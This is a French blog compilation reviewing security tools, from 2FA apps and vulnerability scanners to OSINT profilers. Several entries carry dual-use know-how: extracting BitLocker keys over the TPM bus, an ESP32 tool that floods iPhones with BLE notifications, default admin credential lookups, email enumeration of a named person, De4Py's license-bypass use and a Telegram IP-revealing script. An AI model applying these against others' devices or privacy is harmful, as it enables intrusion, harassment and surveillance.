Vous l’aurez compris, ANY.RUN permet aux chercheurs en sécurité d’éliminer totalement ce besoin d’avoir une infrastructure d’analyse. C’est un gain de temps et de sécurité assuré ! Et comme c’est un outil professionnel, vous pouvez également l’utiliser en combinaison avec votre SIEM (Security Information and Event Management) / SOAR (Security Orchestration, Automation and Response).
Si vous cherchez une application pour gérer tous vos codes de double authentification, je vous propose aujourd’hui qu’on se penche sur le cas de 2FAS.
Il s’agit d’une application disponible en français sous iOS et Android qui est totalement libre et qui supporte les codes TOTP (time-based one-time passwords) et HOTP.
Pour rappel, le 2FA (Two-Factor Authentication) est une méthode d’authentification qui fournit une couche supplémentaire de sécurité pour les comptes en ligne. Ainsi en plus du nom d’utilisateur et du mot de passe, le 2FA utilise un deuxième facteur, qui n’est ni plus ni moins qu’un mot de passe à usage unique (OTP) affiché sur le téléphone de l’utilisateur, pour vérifier l’identité de ce dernier. Cela permet d’empêcher l’accès non autorisé aux comptes, même si le mot de passe est compromis.
Le fonctionnement de 2FAS est assez similaire à celui d’Authy ou de Google Authenticator. Sauf que 2FAS propose de la synchronisation sur votre compte iCloud / Google si vous le désirez et la possibilité d’importer des codes existants depuis d’autres outils comme Aegis, Raivo OTP, Lastpass, Google Authenticator, andOTP ou encore Authenticator Pro. Pour ceux qui sont coincés avec Authy, vu que ça ferme, surveillez le blog dans les jours qui viennent, je vous prépare un tuto pour vous sauver.
Pour sécuriser l’app, vous pouvez lui ajouter un code pin ansi sur le faceID, et cerise sur le gateau, vous avez la possibilité d’installer une extension sur votre navigateur desktop qui ira communiquer directement avec votre smartphone pour saisir à votre place les codes de double authentification via une simple alerte.
Bref, c’est un outil moderne, avec une interface très sympa et en plus c’est libre ! Que demande le peuple ?
A tous les fondus d’analyse de code, aujourd’hui, j’aimerais vous présenter De4Py, un déobfuscateur Python avancé qui s’est donné pour mission de révolutionner le domaine pour les analystes de malwares et les experts en reverse engineering.
Développé par le duo Fadi002 et AdvDebug, cet outil se distingue non seulement par son interface conviviale, mais aussi par un ensemble de fonctionnalités avancées conçues pour, entre autres, déchiffrer les fichiers Python.
Ce toolkit prend en charge toute une gamme d’obfuscateurs populaires, incluant Jawbreaker, BlankOBF, PlusOBF, Wodx, Hyperion et l’obfuscateur de pyobfuscate.com. Cette polyvalence vous assure de pouvoir décoder un large éventail de fichiers obfusqués avec une grande facilité.
L’une des fonctionnalités phares de l’outil est sa capacité d’exécution de code. Cela permet aux utilisateurs d’exécuter du code Python au sein de l’outil. Par exemple, ils expliquent sur le Github, que grâce à ça, si un programme demande une licence pour fonctionner dans son intégralité, De4py permet d’accéder directement aux fonctionnalités principales de l’outil, et par conséquent de contourner les restrictions liées à la licence.
La fonction de Dump de chaînes de caractères est un autre atout crucial. Elle facilite l’extraction de textes du processus Python et les sauvegarde dans un fichier, rendant plus aisée l’extraction de données de la mémoire, y compris des informations sensibles comme les webhooks. Il est capable également d’identifier les chaines de caractères « interessantes » comme les IP, les sites web et les mots-clés liés à des informations sensibles.
De4py aborde également le défi que représentent ces programmes Python qui tentent de s’auto-terminer lorsqu’ils détectent un débogueur ou une machine virtuelle. En supprimant la fonction de sortie, il vous permettra de ne plus galérer avec des sorties de programme surprises. De4py dispose aussi d’une fonctionnalité qui permet de récupérer et d’accéder à toutes les fonctions se trouvant dans le processus, ce qui est pratique si on veut modifier certaines fonctions en mémoire de manière plus précise.
Il y a également un analyseur de fichiers pour détecter si un programme Python est « packé ». Il tente alors d’extraire les programmes qui s’y trouvent en utilisant pyinstaller. Enfin, De4Py est capable de surveiller le comportement du programme sur votre système à savoir tout ce qui est manipulations de fichiers, activités de processus, interactions avec la mémoire, et même les communications via socket, avec détail de la taille des données transmises / reçues et des adresses IP. Cette fonctionnalité permet également l’extraction du contenu des sockets et le déchiffrement du contenu chiffré OpenSSL directement dans un fichier.
Bref, que ce soit via son interface graphique ou en mode terminal, De4Py est un super outil pour tous les amateurs de reverse engineering qui font notamment de l’analyse de malware.
Alors, non, c’est pas l’ex d’Angelina. C’est plutôt l’équivalent numérique du nid de poule rempli de goudron dans lequel allaient mourir les dinosaures et les mammouth. Un tarpit est donc un système informatique qui va ralentir, voire embourber, n’ayons pas peur des mots ^^ les scripts kiddies qui seraient tentés de faire du bruteforce sur votre serveur.
Vous l’aurez compris, c’est donc un système de sécurité qui fait perdre du temps à l’assaillant en lui faisant croire qu’il est bon endroit, mais où chacun de ses essais de mots de passe devient de plus en plus lent.
Alors comment est ce qu’on met ça en place ?
Et bien sur votre serveur Linux, vous pouvez opter pour l’outil Endlessh. C’est open source, et c’est vachement efficace contre les bruteforce à destination de SSH. Une fois configuré, quand l’attaquant arrive sur l’écran de connexion SSH, tout ce qu’il fera ou verra à l’écran sera en réalité un faux écran de login SSH propulsé par Endlessh qui s’affichera tellement lentement que la seule option sera d’abandonner l’attaque.
Tout est réglable, à savoir le port utilisé, le délai d’affichage des messages, le nombre max de clients…etc.
Usage: endlessh [-vhs] [-d MS] [-f CONFIG] [-l LEN] [-m LIMIT] [-p PORT]
-4 Bind to IPv4 only
-6 Bind to IPv6 only
-d INT Message millisecond delay [10000]
-f Set and load config file [/etc/endlessh/config]
-h Print this help message and exit
-l INT Maximum banner line length (3-255) [32]
-m INT Maximum number of clients [4096]
-p INT Listening port [2222]
-s Print diagnostics to syslog instead of standard output
-v Print diagnostics (repeatable)
De base, les gens qui utilisent ce tarpit le branchent sur le port 22 (qui est normalement celui de SSH) pour utiliser un autre port pour leur vrai accès distant. Mais grâce à cet autre projet nommé Fail2ban Endlessh, il est parfaitement possible de conserver une connexion classique SSH sur le port 22, mais de rediriger les IPs qui vous maltraitent vers Endlessh.
Voilà super outil qui ne consomme rien en termes de ressources, mais qui vous permettra de vous défendre contre les tentatives de connexions SSH non autorisées tout en réduisant la charge du serveur (puisque ça dissuade les cyber-Titouan de le bruteforcer).
Depuis maintenant plusieurs années, les utilisateurs de Windows ont la possibilité de sécuriser leurs données avec Bitlocker, l’outil de chiffrement de Microsoft. C’est hyper simple à mettre en place et les constructeurs l’ont adopté depuis longtemps en intégrant à leurs ordinateurs la fameuse puce TPM (Trusted Platform Module).
Ce qui permet à Bitlocker d’y stocker toutes les informations critiques relatives à la configuration de l’ordinateur, mais surtout la Master Key, c’est-à-dire la clé qui permet de déchiffrer tout le contenu.
C’est là qu’entre en scène le chercheur en sécurité StackSmashing qui a mis au point un moyen d’extraire physiquement cette clé à l’air d’un Raspberry Pi Pico à moins de 10 balles, d’un peu de soft, et d’un petit PCB maison. Grâce aux pins de son PCB, il peut alors se brancher directement au bus LPC de la puce TPM qui se trouve au dos de la carte mère, ce qui permet d’intercepter les messages transmis (donc la master key) entre la puce TPM et le CPU de l’ordinateur.
Comme vous pouvez le voir sur la vidéo, son bricolage est spécifique à certains modèles de laptop Lenovo (Thinkpad), mais ça peut-être facilement adapté (ou alors en soudant des fils) à tout type d’ordinateur comme il le montre à la fin, avec la Surface Pro (et un petit trou dans sa carlingue)
Toutefois, n’allez pas croire que votre ordinateur est forcément sensible à cette attaque surtout s’il est récent puisqu’à présent, les fabricants de processeurs comme Intel ou AMD ont directement intégré le TPM au CPU, donc c’est plus la même partie de plaisir.
Si comme moi, vous recevez une grosse quantité de spams et que ça commence à vous saouler, il est temps de leur déclarer la guerre.
Mais comment ?
Et bien grâce à Signal Spam ! Il s’agit d’une application et d’extensions pour navigateurs / clients mail qui vous permet de lutter contre les courriers indésirables en les signalant.
Vous l’aurez compris, ce n’est pas un filtre qui va vous protéger des spams, mais c’est un outil de signalement qui vous permettra de balancer les spammeurs comme votre grand papy balançait ses voisins pendant la Seconde Guerre mondiale. Cela permet mail après mail de réguler le marché de l’emailing et d’encourager des pratiques responsables.
L’outil est dispo pour Mac, iOS et dans tous les navigateurs et clients mails les plus courants. Ça permet de faire des signalements hyper rapidement d’un seul clic.
Et si vous ne voulez pas installer cet outil, mais quand même dénoncer un spammeur, vous pouvez utiliser le formulaire du site Signal Spam en suivant ces instructions :
Twitter, ou devrais-je dire X est un réseau social qui permet d’en apprendre beaucoup sur les gens qui l’utilisent. Mais avec autant de données, c’est difficile de faire des analyses correctes sans aucun outil.
Heureusement, il y a Tinfoleak, un outil d’OSINT / SOCMINT open source capable d’automatiser l’extraction d’informations à partir de X et de faciliter l’analyse qui en découle.
Ainsi, à partir d’un identifiant utilisation, de coordonnées géographiques ou d’un simple mot clé, Tinfoleak est capable d’extraire l’ensemble des informations depuis Twitter (pour peu que vous ayez une clé Oauth) et de vous cracher de la donnée structurée.
Tinfoleak excelle donc dans l’extraction d’une large gamme d’informations de Twitter, notamment :
Informations sur le compte : ID utilisateur, nom d’utilisateur, description du profil, emplacement et date de création
Activité des utilisateurs : Tweets, retweets, likes, abonnements et abonnés
Mesures de protection : Tweets protégés, comptes vérifiés et paramètres de géolocalisation
Relations entre utilisateurs : Abonnés, amis, mentions et réseaux de retweets
Applications sources : Dispositifs et plateformes utilisés pour accéder à Twitter
Fréquence d’utilisation : Fréquence de publication de tweets, modèles d’activité quotidienne et tendances d’utilisation
Hashtags et mentions : Analyse des sujets tendance, des hashtags pertinents et des utilisateurs engagés
Analyse du texte : Analyse du sentiment, fréquence des mots et thèmes clés
Médias et métadonnées : Analyse des médias intégrés, des images et du contenu vidéo
Emplacements des utilisateurs : Lieux visités, itinéraires et principaux emplacements
Réseaux sociaux et identités numériques : Liens vers d’autres profils de médias sociaux et présence en ligne
Utilisateurs géolocalisés et utilisateurs tagués : Identification des utilisateurs par emplacement et des individus tagués
Abonnés et amis : Analyse des réseaux d’abonnés et d’amis, des relations et du comportement
Listes et collections : Enquête sur les listes et collections sélectionnées et l’adhésion
Conversations : Compréhension des discussions en cours, des interactions et des dynamiques de groupe
Si vous utilisez Kali ou ce genre de distrib Linux spécialisée en sécurité, vous le connaissez peut-être puisque c’est inclu dedans.
Sinon, pour l’installer, ouvrez un terminal et installez tout ce qu’il faut :
Ainsi, vous pourrez mieux comprendre les tendances sociales et l’opinion publique en analysant les hashtags populaires, les mentions…etc. Vous pourrez également identifier les influenceurs cl&s dans les domaines que vous ciblez, voire évaluer les menaces en fonction des mentions de sujets sensibles. Et si c’est plutôt la guerre commerciale qui vous intéresse, vous pourrez analyser la concurrence.
On est en plein hiver et tous les petits vieux normalement constitués sont maintenant vaccinés contre la grippe. C’est cool, Raoult Raoul !
Mais avez-vous pensé à la santé de vos images Docker ? Et bien oui, parce qu’à force de télécharger tout un tas de conteneurs anciens et pas maintenus, vous avez sans le savoir des vulnérabilités dans vos conteneurs.
Mais alors, comment savoir ? Et bien grâce à Grype qui n’est pas un virus, mais un incroyable scanner de vulnérabilités qui peut analyser les images de conteneurs Docker, OCI et Singularity et les systèmes de fichiers.
Cet outil est ainsi capable de débusquer des vulns sur les systèmes d’exploitation containérisés tels que Alpine, Amazon Linux, BusyBox, CentOS, Debian, Ubuntu, mais également tout ce qui est vulnérabilités relatives à des langages de dev tels que Ruby, Java, JavaScript, Python, Dotnet, Golang, sans oublier PHP !
Pour l’installer, vous pouvez récupérer le binaire sur Github ou lancer la commande Curl suivante :
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin
Si vous êtes sous Mac, en plus d’être un beau gosse, vous pouvez aussi l’installer avec Brew :
brew tap anchore/grype
brew install grype
Ensuite, pour le lancer, rien de plus simple, vous appelez la commande, suivi du nom de l’image Docker telle qu’on la trouve sur le hub.docker.com par exemple. Voici un exemple de scan avec cette image de l’éditeur Balena :
./grype balena/open-balena-vpn
Et pour ne voir que les vulnérabilité existantes pour lesquelles il existe un fix, vous pouvez également ajouter le paramètre suivant :
./grype balena/open-balena-vpn --only-fixed
Par défaut Grype scanne uniquement les vulnbérabilités visibles du conteneur, mais si vous voulez faire un truc plus en profondeur et scanner toutes les couches de ce même conteneur, ajoutez le paramètre suivant :
./grype balena/open-balena-vpn --scope all-layers
Au niveau des exports, vous pouvez sortir tout ça sous la forme d’un tableau dans le terminal, ou d’un rapport JSON ou XML pour ensuite l’interroger avec des outils comme jq.
L’utilisation de Grype vous permet également un niveau élevé de personnalisation. Vous pouvez ainsi définir la portée de la recherche avec des expressions permettant d’inclure ou exclure certains fichiers ou répertoires.
Un autre atout majeur de Grype est sa capacité à intégrer des sources de données externes pour une meilleure correspondance des vulnérabilités. Ainsi, il peut analyser les données provenant de bases telles que Alpine Linux SecDB ou Debian Linux CVE Tracker pour vous fournir des informations encore plus précises sur les failles potentielles que votre image pourrait présenter.
En parlant d’intégration, si vous travaillez avec GitHub et utilisez les Actions GitHub, Grype s’intègre parfaitement pour exécuter des analyses de vulnérabilités lors de vos workflows CI, assurant ainsi la sécurité de votre code et de vos conteneurs à chaque étape du processus.
Bref, dans l’ensemble, Grype est un outil essentiel pour tous ceux qui souhaitent garantir la sécurité et l’intégrité de leurs images Docker et pas que. Que ce soit pour identifier les vulnérabilités ou tirer parti des fonctionnalités avancées telles que les sources externes et l’intégration des actions GitHub, Grype est un allié de taille dans la lutte continuelle contre les failles potentielles qui peuvent compromettre votre infrastructure.
On a tous des secrets à cacher… Mais ça n’empêche pas certains développeurs un poil tête en l’air de placer ces secrets sur leurs dépôts Git. Vous l’aurez compris, quand je parle de « secrets » je parle surtout d’identifiants et de clés API qui pourraient malencontreusement se retrouver en clair dans des fichiers de code ou des textes qui seraient embarqués sur Github lors d’un git push.
Alors que faire pour éviter cela ?
Et bien que ce soit sous un aspect défensif ou offensif, Nosey Parker est l’outil qui vous faut pour dénicher les petits secrets cachés dans les coins sombres des codes et des fichiers textes de Github.
L’outil est capable de scanner des fichiers, des répertoires et l’historique entier de dépôts Git et de les passer au peigne fin à l’aide d’expressions régulières et quand il trouve quelque chose, hop l le mets de côté dans un datastore.
Cela va donc vous permettre de faire des audits de code ou tout simplement de vérifier que vous n’êtes pas ce développeur distrait dont je parlais en introduction d’article.
Pour afficher à nouveau les trouvailles d’un Scan depuis son datastore :
noseyparker summarize --datastore noseyparker
Et pour avoir le rapport détaillé :
noseyparker report --datastore noseyparker
Et voilà, vous connaitrez en détail toutes vos fuites de données. Évidemment, c’est à utiliser avec intelligence pour sécuriser votre propre code, ou dans des missions d’audit sur lesquelles vous avez été validé.
Imaginez, vous êtes un gentil utilisateur de Linux, pour qui tout se passe bien. Vous travaillez sur un fichier important et à un moment, boum bim patatra, vous faite THE boulette, à savoir, vous écrasez votre fichier par un autre truc sans importance.
Quelle horreur.
MAIS PAS DE PANIQUE, je vais pouvoir vous aider avec RecoverPy. Il s’agit d’un outil puissant qui exploite les capacités de votre système pour récupérer des fichiers perdus. Dispo uniquement sur les systèmes Linux, cet utilitaire, une fois installé, vous permet de sélectionner la partition système, et de rechercher une chaîne de texte voulu pour comme par enchantement récupérer les résultats.
Pour installer l’outil, vous aurez besoin des programmes suivants : grep, dd et lsblk.
Tel un archéologue de la data, vous pourrez alors sauvegarder des blocs individuellement et explorer des blocs voisins pour augmenter vos chance de récupérer ces fichiers. Mais attention, pensez toujours à faire des sauvegardes et à démonter la partition avant de commencer votre aventure, car on ne sait jamais. C’est un peu l’outil de la dernière chance.
Vous l’aurez compris, RecoverPy est un outil précieux qui mérite toute votre attention et qui saura vous sauver la mise le moment venu.
Il était une fois, au fond d’un grenier obscur et poussiéreux, un routeur que personne n’avait utilisé depuis des lustres. Oublié par tous, il était là, désespérément fidèle à son mot de passe par défaut. Si seulement quelqu’un avait eu l’outrecuidance de lui donner une seconde chance…
Et bien, aujourd’hui, c’est son grand jour grâce à cet outil de recherche de mots de passe par défaut baptisé Default Credentials Cheat Sheet.
Default Credentials Cheat Sheet est une base de référence des identifiants par défaut de tout un tas de matos principalement réseau, pour aider les pentesteurs et les bidouilleurs à se connecter en admin à du matos un peu ancien. Il s’appuie sur des projets tels que changeme, routersploit et Seclists pour offrir une base de données conséquente et est compatible avec Kali Linux, Ubuntu, Lubuntu et leurs dérivés.
Pour l’installer, tapez ceci dans votre terminal :
pip3 install defaultcreds-cheat-sheet
Les fonctionnalités de cet outil incluent la recherche de mots de passe, la mise à jour des enregistrements, l’exportation de données et un outil de recherche nommé Pass Station.
Pour utiliser creds, une fois installé, il suffit d’ouvrir un terminal et d’entrer la commande suivante en précisant le matériel qui vous intéresse.
creds search linksys
Et ensuite, pour mettre à jour la base :
creds update
Ou encore faire un export des identifiants qui vous intéressent
creds search linksys export
De quoi accéder à vos anciens appareils et de leur redonner vie.
Il y a des moments où vous vous trouvez avec un tas de documents importants et confidentiels, que vous souhaitez protéger des regards indiscrets. Que ce soit pour cacher vos photos de vacances, des dossiers professionnels sensibles ou simplement pour sécuriser vos projets personnels, un outil de cryptage robuste et facile à utiliser est un élément essentiel de votre arsenal numérique. Vous me demandez : « Mais Korben, existe-t-il un outil capable de faire tout cela sans avoir besoin d’être un super génie de la cryptographie ? » Bien sûr que oui ! Laissez-moi vous présenter Picocrypt.
Picocrypt est un logiciel de cryptage simple, sécurisé et gratuit qui utilise le chiffrement XChaCha20 et la fonction de dérivation de clé Argon2id pour protéger vos fichiers avec une facilité déconcertante. Il se démarque de ses concurrents tels que VeraCrypt, 7-Zip, BitLocker et Cryptomator par sa légèreté et sa portabilité, tout en offrant une interface intuitive même pour les débutants.
En plus de protéger vos fichiers contre les intrusions, Picocrypt prévoit également le pire en offrant des fonctions avancées telles que la protection contre la corruption des fichiers via Reed-Solomon, ainsi que l’utilisation de fichiers clés multiples pour sécuriser un volume partagé. Imaginez un scénario où chaque membre de votre équipe détient un fichier clé, et tous ces fichiers clés sont nécessaires pour déchiffrer le document sécurisé mis en commun.
L’un des atouts majeurs de Picocrypt est sa capacité à déjouer les attaques des ordinateurs quantiques grâce à son chiffrement basé sur une clé privée (c’est pas moi qui le dis, je ne suis pas un spécialiste du cassage de code quantique, mais c’est ce que les dev de Picocrypt expliquent).
L’outil possède également un générateur de mots de passe sécurisés, des commentaires non chiffrés ainsi qu’un mode « parano » offrant une sécurité maximale en combinant XChaCha20 et Serpent.
Maintenant que je vous ai bien chauffé, vous vous demandez peut-être où vous pouvez obtenir ce petit bijou ?
Et bien, rendez-vous sur ce lien pour accéder au GitHub officiel de Picocrypt, où vous pourrez télécharger la dernière version pour Windows, macOS et Linux. Si votre antivirus le signale comme un virus, signalez-le comme un faux positif, ce sera sympa pour les suivants. Une version installable est également dispo pour Windows.
Notez que Picocrypt ne nécessite pas de droits d’administrateur sur la machine et est même disponible dans le navigateur sous la forme d’une interface web limitée. Pour discuter du projet et poser des questions, rendez-vous sur le Reddit r/Picocrypt.
Bref, si vous cherchez un outil simple, sûr et portable pour protéger vos précieux fichiers, ne cherchez pas plus loin que Picocrypt.
Si vous êtes sous Mac et que vous avez moyen confiance dans les rigolos qui partagent votre open space, j’ai un outil pour vous.
SwiftGuard est un outil de sécurité pour macOS qui offre une surveillance des ports USB, une liste blanche d’appareils autorisés et la possibilité de tout personnaliser aux petits oignons. Cet outil génial vise à protéger vos fichiers et à empêcher l’exfiltration de données, notamment dans les environnements publics.
Cette application anti-forensic se niche dans votre barre des tâches, scrutant les allées et venues sur vos ports USB.
Et si un intrus USB est détecté, SwiftGuard réagira au quart de tour, mettant votre système en hibernation ou l’éteignant carrément.
Mais ne vous inquiétez pas, vos fidèles périphériques à vous, seront sur liste blanche, et vous avez évidemment le contrôle des actions à exécuter, avec même un compte à rebours pour désarmer la procédure d’extinction.
Avec ce genre d’outil, il est possible également de déterminer qu’une clé USB connectée à l’ordinateur se comporte comme un sésame et qu’une fois qu’on la retire, l’ordinateur s’arrête. En attachant cette clé USB à votre poignet, si quelqu’un subtilise votre ordinateur pendant que vous l’utilisez, la clé sera déconnectée et le Mac s’éteindra automatiquement.
J’avoue, c’est pour les super paranos, ou pour les sociétés qui ont des protocoles de sécurités très élevés mais savoir que c’est possible, c’est déjà ça. En plus, c’est totalement open source, donc auditable et compilable sans soucis.
Bref, vous transformez votre Mac en forteresse numérique, et ça, c’est cool !
Encore une « faille » rigolote qui vient de surgir sur la toile et qui cette fois concerne les notifications Bluetooth low energy (BLE) sur iPhone. On a vu ça récemment ce genre de spam arriver sur iPhone et appareils Android grâce au Flipper Zero mais comme cet appareil est aussi cher qu’inutile pour les normies comme vous et moi, j’ai mieux à vous proposer.
Pour ceux qui l’ignorent, l’ESP32 est carte électronique disposant d’une connectivité Wi-Fi et Bluetooth intégrée, qui rencontre un grand succès dans le monde de l’électronique pour sa polyvalence et son faible coût.
Avec l’outil nommé EvilAppleJuice ESP32, il est donc possible de spammer les iPhone avec des notifications BLE à l’aide d’un seul ESP32.
Voici à quoi ressemble ce genre de notifications :
Imaginez ça à l’infini maintenant….
Ce joyeux bordel numérique est basé sur le travail de Ronald Stoner dispo le repo AppleJuice. Et en y ajoutant des capacités de randomisation, cela peut rendre un iPhone quasiment inutilisable, tout cela grâce à au code d’Evil Apple Juice et à un seul ESP32.
Voici ce que ça donne IRL :
Les tests ont confirmé que cette méthode fonctionne sur des modèles tels que l’iPhone 14 Pro (sous iOS 16.6.1), l’iPhone 13 Pro, l’iPhone 11 (sous iOS 16.6.1) et l’iPhone X (sous iOS 14.8).
Il semble qu’il y ait quand même quelques limitations puisque l’outil n’envoie pas de notifications si le clavier ou la caméra est actif. Mais bon, il faut bien que votre iPhone fasse une petite pause, non ?
La partie intéressante c’est l’implémentation dans ce code de fonctionnalités comme la modification de l’adresse MAC source de manière totalement aléatoire (BLE_ADDR_TYPE_RANDOM), la possibilité de choisir aléatoirement le type de notification BLE ou l’un des appareils reconnus possibles. Ces choix étant alors renouvelés à chaque exécution (par défaut, toutes les secondes).
Si vous faites le calculs, étant donné les 29 accessoires bluetooth compatibles existants et les 3 types de notifications possible, cela fait un total de 87 types de notifications uniques possibles (sans tenir compte de l’adresse MAC source aléatoire), dont une est diffusée chaque seconde. Et pour le moment, pas de correctif côté Apple.
Pour tester ce truc, achetez un ESP32, clonez le repo et lisez la doc (le plus simple étant d’utiliser VS Code avec PlatformIO pour le télécharger sur votre ESP32).
N’oubliez pas, tout cela est à utiliser avec prudence et responsabilité dans le cadre de tests sur votre propre matériel. Sinon, vous irez en prison et moi ça me fera des lecteurs en moins, et ça c’est pas cool.
Je ne sais pas si vous vous souvenez, mais il y a quelques mois. Je vous ai présenté Holehe. C’est un outil d’OSINT qui permet de lancer des recherches sur les réseaux sociaux et divers sites web afin de collecter des informations sur une personne simplement à partir de son adresse email.
Très cool et pour l’installer, c’est easy :
pip3 install holehe
Et en complément à cet outil, je vous présente aujourd’hui Turbolehe qui se greffe sur Holehe et qui va vous permettre d’améliorer vos enquêtes OSINT grâce à une recherche pas nom + prénom, ainsi que de la génération de rapports.
Ça s’installe comme ça :
git clone https://github.com/UserCr4ig/Turbolehe
cd Turbolehe
Ça fonctionne presque tout pareil: il suffit d’entrer la commande suivante avec le nom et le prénom :
python3 turbolehe.py NOM PRENOM
L’outil générera alors toutes les combinaisons d’adresse e-mail possible, puis les vérifieras sur tous les sites qu’il connaît. En plus, cela produira également des rapports en CSV que vous pourrez utiliser dans vos process, ou tout simplement lire avec n’importe quel tableur.
Noter que si vous voulez cibler sur un nom de domaine en particulier, pour vous limiter, par exemple à une entreprise, c’est également possible avec le paramètre -B :
python turbolehe.py John Doe -B
Des améliorations futures incluront la gestion de plus grandes quantités de données et du multithreading, ce qui rendra l’outil encore plus rapide et efficace. Si ça vous intéresse, c’est disponible via GitHub, où vous pouvez également trouver le code source et les instructions pour l’installation et l’utilisation de l’outil.
Pour résumer, Turbolehe est un outil incroyablement utile pour les amateurs d’OSINT et les détectives du dimanche comme moi. Il automatise le processus de génération et de vérification d’adresses e-mail, ce qui vous permettra de gagner du temps dans vos enquêtes.
Ah, la guerre éternelle contre les malwares… Parfois, l’ordinateur fait tellement n’importe quoi, qu’on se demande si on n’a pas chopé un bon vieux virus. Oui, oui, vous vous reconnaissez, ceux qui ne font jamais leurs mises à jour Windows et qui disent en frimant : « Oh moi, j’ai pas besoin d’antivirus, car je sais ce que je fais.«
LOL !
Et bien, aujourd’hui, je vais vous parler d’un super-héros qui pourrait bien vous sauver la vie, enfin, celle de votre ordinateur : ESET SysRescue Live.
Imaginez que vous êtes en train de travailler sur un projet important et, soudain, votre ordinateur commence à agir bizarrement. Les performances ralentissent et vos fichiers deviennent inaccessibles. Vous réalisez que votre ordinateur a été infecté par le dernier malware. Vous essayez tous les logiciels antivirus possibles, mais rien ne semble fonctionner.
Alors, que faire à part m’envoyer un message sur Facebook si vous êtes ma mère ? C’est là qu’ESET SysRescue Live entre en jeu.
ESET SysRescue Live est un outil anti-malware qui fonctionne via un support amovible (CD, DVD ou clé USB) et qui peut être utilisé indépendamment du système d’exploitation installé sur votre ordinateur. Ce petit génie peut ainsi éliminer les menaces persistantes en accédant directement au disque dur et aux fichiers système. Compatible avec plusieurs versions de Windows, il est conçu pour analyser et éliminer les menaces à la demande.
Pour utiliser ESET SysRescue Live, vous devez d’abord télécharger l’image ISO / IMG et la graver sur un CD/DVD ou créer une clé USB bootable. Une fois cela fait, insérez le support amovible et redémarrez votre ordinateur. Assurez-vous que votre ordinateur est configuré pour démarrer depuis le support amovible (vous devrez peut-être accéder aux paramètres du BIOS pour cela).
Une fois ESET SysRescue Live lancé, vous serez accueilli par une interface utilisateur simple et conviviale. L’outil vous proposera de mettre à jour sa base de données de signatures de virus. Il est fortement recommandé de le faire pour assurer une détection optimale des menaces.
Après la mise à jour, vous pouvez lancer une analyse de votre ordinateur. ESET SysRescue Live offre plusieurs options d’analyse, notamment une analyse rapide, une analyse intelligente et une analyse personnalisée. Les deux premières options analysent les zones les plus couramment infectées, tandis que l’option personnalisée vous permet de choisir les disques et dossiers spécifiques à analyser. Une fois l’analyse terminée, les menaces détectées seront affichées et vous pourrez les supprimer en toute sécurité.
Il est important de noter qu’ESET SysRescue Live n’est pas conçu pour remplacer votre logiciel antivirus habituel. Il est plutôt destiné à être utilisé en complément, en particulier dans les situations où un malware persistant empêche le bon fonctionnement de votre système. Cet outil est idéal pour les situations où vous devez éradiquer un malware tenace qui résiste aux méthodes de suppression traditionnelles.
Vous y trouverez également des utilitaires pratiques comme memtest, Midnight Commander ou Gparted pour ceux qui veulent partitionner leur disque ou augmenter la taille de leurs partitions existantes.
En résumé, ESET SysRescue Live est un outil pratique et puissant pour nettoyer votre ordinateur des menaces persistantes qui refusent de partir ou pour effectuer des petites opérations de maintenance sur l’ordi.
Ce n’est pas si souvent que l’on tombe sur une vulnérabilité qui fait réfléchir à l’équilibre entre la simplicité et la sécurité. En effet, les chercheurs de Team82 ont découvert un bug intéressant chez Synology, qui prouve que parfois une solution simple peut créer un problème complexe.
Synology est un nom populaire dans le monde des systèmes de stockage réseau (NAS). Leur système d’exploitation, DiskStation Manager (DSM), est conçu pour vous aider à gérer et partager vos fichiers facilement et de manière centralisée. Mais, malheureusement, ils ont utilisé une approche trop simpliste pour générer le mot de passe administrateur du NAS lors de sa création. Et cela a ouvert une voie exploitable par les attaquants.
Cette vulnérabilité, référencée sous le code CVE-2023-2729, provient de l’utilisation de la méthode Math.random() pour générer le mot de passe administrateur. Cette méthode n’est pas cryptographiquement sécurisée, et un attaquant pourrait récupérer suffisamment d’informations afin de reconstruire le mot de passe admin.
Toutefois, rassurez-vous, il faut que pas mal de conditions soient réunies pour que cela se produise en vrai. Mais on ne sait jamais ^^.
Alors, comment ça se passe en réalité ?
Et bien, l’équipe de recherche a découvert qu’en faisant fuiter la sortie de quelques valeurs générées par Math.random(), il était possible de reconstruire la valeur de la seed utilisée pour le générateur de nombres pseudo-aléatoires (PRNG). En connaissant cette seed, un attaquant pourrait alors prédire les valeurs futures et générer le mot de passe administrateur permettant alors de prendre le contrôle du compte admin.
Bien sûr, ce n’est pas si simple : pour exécuter l’attaque, il faut d’abord trouver un moyen de récupérer certaines valeurs Math.random(). Mais les chercheurs ont découvert que certains GUID générés lors de la première installation utilisaient également Math.random(), et que ces GUID pouvaient être utilisés pour reconstruire la graine PRNG.
Cependant, même si un attaquant réussissait à récupérer ces informations, cela ne suffirait pas en soi. Par défaut, le compte administrateur intégré est désactivé, et la plupart des utilisateurs ne l’activeraient pas (Et ils ont raison !).
Cette vulnérabilité a été découverte en préparant le concours Pwn2Own et les gens qui ont travaillé là dessus s’accordent pour dire que cette faille serait presque impossible à exploiter dans une situation réelle. Toutefois, ils ont quand même décidé de partager leur découverte pour souligner l’importance d’utiliser des générateurs de nombres aléatoires cryptographiquement sécurisés lors de la création de mots de passe.
Bref, si vous êtes développeurs, n’utilisez pas Math.random() pour générer des nombres aléatoires quand il s’agit de faire de la sécurité. À la place, il est recommandé d’utiliser l’API Web Crypto et, plus précisément, la méthode window.crypto.getRandomValues().
Synology a évidemment été informé de la vulnérabilité, et ils ont rapidement publié un correctif pour les appareils concernés. Les utilisateurs de DSM 7.2 sont donc invités à mettre à niveau leur système vers la version 7.2-64561 ou ultérieure.
Attention, Telegram ce n’est pas forcément le truc le plus étanche qui soit en matière de confidentialité. Si je vous disais, par exemple, qu’il existe un moyen simple de découvrir l’adresse IP de votre interlocuteur sur Telegram ?
Pour commencer, une petite mise en garde : ce script est destiné à des fins éducatives et ne doit pas être utilisé pour violer la vie privée des autres. Assurez-vous donc d’avoir l’autorisation de la personne concernée avant de procéder.
Je n’ai pas encore eu le temps de le tester, mais pour le faire fonctionner, vous aurez besoin d’installer le client Telegram Desktop sur votre ordinateur. Ensuite, vous aurez besoin de tshark, un outil d’analyse de réseau qui fait partie de la suite Wireshark. Tshark est disponible pour macOS, Linux et Windows, ce qui signifie que vous pouvez utiliser ce script sur presque toutes les plateformes.
Une fois que vous avez installé tshark, il est temps de mettre les mains dans le cambouis et de commencer à débusquer ces adresses IP. Le script Telegram get remote IP, qui est disponible sur GitHub, est assez simple à utiliser et nécessite que les interlocuteurs soient dans les contacts Telegram de chacun.
